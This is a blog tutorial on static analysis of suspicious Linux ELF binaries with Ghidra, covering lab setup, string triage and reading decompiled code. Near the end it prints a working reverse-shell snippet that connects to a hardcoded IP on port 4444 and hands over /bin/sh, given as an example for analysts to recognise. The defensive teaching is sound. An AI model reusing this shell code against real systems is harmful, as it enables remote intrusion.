Static Malware Analysis with Ghidra: A Hands-on Guide for Linux

Security tutorial - IT technology blog
Security tutorial - IT technology blog

Why I Start Every Investigation with Static Analysis

A few months ago, an SSH brute-force attack hit my server at 2:00 AM. The attacker managed to drop a 15KB ELF binary into the /tmp directory before the automated block kicked in. That incident changed my approach to security. It wasn’t enough to just patch the hole; I needed to know exactly what that binary was designed to do. Most attackers deploy small, compiled files—ELF for Linux or PE for Windows—to establish persistence or exfiltrate data.

To handle these threats safely, you need to look inside the file without actually running it. This is the essence of static analysis. Ghidra, the open-source reverse engineering suite from the NSA, is the best tool for this job. It allows you to decompile complex binaries into readable C-like code so you can map out an attacker’s intent without risking a system infection.

Static vs. Dynamic Analysis: Look Before You Leap

When you find a suspicious file, you have two ways to investigate. Choosing the right one depends on your goals and your environment.

Static Analysis

Static analysis is my preferred first step because it is inherently safe. You examine the code, headers, and strings while the file sits idle. You aren’t risking a live infection on your host system. By looking at assembly instructions and imported libraries, you can often spot a reverse shell or a keylogger in minutes. However, sophisticated malware uses “packing” or obfuscation to hide its logic until it actually runs.

Dynamic Analysis

Dynamic analysis involves executing the malware in a strictly controlled sandbox or VM. You watch which files it modifies, which registry keys it deletes, and which IP addresses it pings. This reveals the true behavior of the code. The downside is the risk. Advanced malware can detect if it’s in a VM and will alter its behavior to stay hidden.

The Reality of Using Ghidra

Ghidra is a powerhouse, but it isn’t perfect. If you are choosing between Ghidra, IDA Pro, or Radare2, here is what you need to know.

  • The Good:
    • Zero Cost: It is free and open-source. This is a massive win for independent researchers and small security teams.
    • S-Tier Decompiler: Ghidra includes a high-quality decompiler. It does a fantastic job of turning messy assembly back into C code.
    • Architecture Support: It handles almost everything. Whether it’s x86, ARM, MIPS, or PowerPC, Ghidra can likely parse it.
  • The Bad:
    • RAM Hungry: Because it runs on Java, Ghidra is a resource hog. Expect it to use 2GB of RAM just to idle, and much more when analyzing 50MB+ binaries.
    • Complex UI: The interface looks like a cockpit from the late 90s. It is powerful but has a steep learning curve for beginners.

Setting Up Your Linux Analysis Lab

Don’t run Ghidra on your primary workstation. Use a dedicated analysis VM, such as Kali Linux or a hardened Ubuntu instance. This keeps your main environment clean and isolated.

1. Install the Java Development Kit (JDK)

Ghidra 11.x requires JDK 17 or newer. On Ubuntu, you can set this up with a single command:

sudo apt update && sudo apt install openjdk-17-jdk -y

Always verify the version by running java -version before proceeding.

2. Download and Extract

Download the latest stable release from the official GitHub. Once you have the zip file, extract it to your tools directory:

unzip ghidra_11.x.x_PUBLIC_2024xxxx.zip
cd ghidra_11.x.x_PUBLIC

3. Fire It Up

Launch the suite using the provided run script:

./ghidraRun

Workflow: Dissecting a Suspicious Binary

Let’s walk through the process of analyzing an unknown ELF file found on a compromised server.

Step 1: Import and Initial Triage

Start by creating a new project (File > New Project) and select “Non-Shared Project.” Press I to import your suspicious binary. Ghidra will automatically detect the format, such as x86-64 ELF. After clicking OK, you’ll see a summary with the entry point and linked libraries. Double-click the file to open the CodeBrowser.

Step 2: Let the Auto-Analyzer Work

When you first open a file, Ghidra will ask to analyze it. Say Yes. This step maps out functions and cross-references. For a standard 1MB binary, this takes about 10 seconds. For massive files, grab a coffee; it might take a few minutes.

Step 3: Hunting for Red Flags in Strings

I always check strings first. Hardcoded IPs, suspicious URLs, or paths like /etc/shadow are dead giveaways. Open Window > Defined Strings. Filter for “http”, “ssh”, or “/tmp”. If you see a domain you don’t recognize, you’ve found your first lead.

Step 4: Finding the ‘Main’ Logic

Look for main in the Symbol Tree. If the binary is “stripped,” the main symbol will be missing. In that case, find the entry function. It usually calls __libc_start_main, and one of the arguments passed to that call is the memory address of the actual main function.

Step 5: Reading the Decompiled Code

The Decompile window is where the magic happens. It translates assembly like mov eax, 0x1 into something human-readable like result = 1;. Watch for these specific patterns:

  • Network Activity: Look for socket, connect, or send. A binary connecting to an external IP on port 4444 is almost certainly a Command and Control (C2) callback.
  • Persistence: Search for fork followed by setsid. This is how malware “daemonizes” to run in the background.
  • Anti-Debugging: Look for ptrace. Malware often uses PTRACE_TRACEME to check if you are watching it. If it detects a debugger, it will simply exit.

Here is a classic example of a reverse shell snippet in the decompiler:

// This code opens a connection and redirects the shell
sock = socket(2, 1, 0);
addr.sin_family = 2;
addr.sin_port = htons(0x115c); // Port 4444
addr.sin_addr.s_addr = inet_addr("192.168.1.100");
connect(sock, &addr, 0x10);
dup2(sock, 0); // Redirect STDIN
dup2(sock, 1); // Redirect STDOUT
dup2(sock, 2); // Redirect STDERR
execve("/bin/sh", NULL, NULL);

Step 6: Cleaning Up the Mess

As you figure out what a variable does, press L to rename it. If you see a variable being used as a file descriptor for a network connection, rename it to network_fd. Press ; to add comments. This turns a wall of gibberish into a documented report.

Final Thoughts

Static analysis is like solving a high-stakes puzzle. You start with a pile of assembly and slowly piece together the story until the attacker’s intent is clear.

Being able to distinguish between a simple script and a sophisticated Remote Access Trojan (RAT) saved me hours of recovery time during my last server breach. Ghidra gives you the clarity needed to make those calls. Just remember: always work in an isolated environment, and never execute the sample unless you are ready for the dynamic analysis phase.

Share: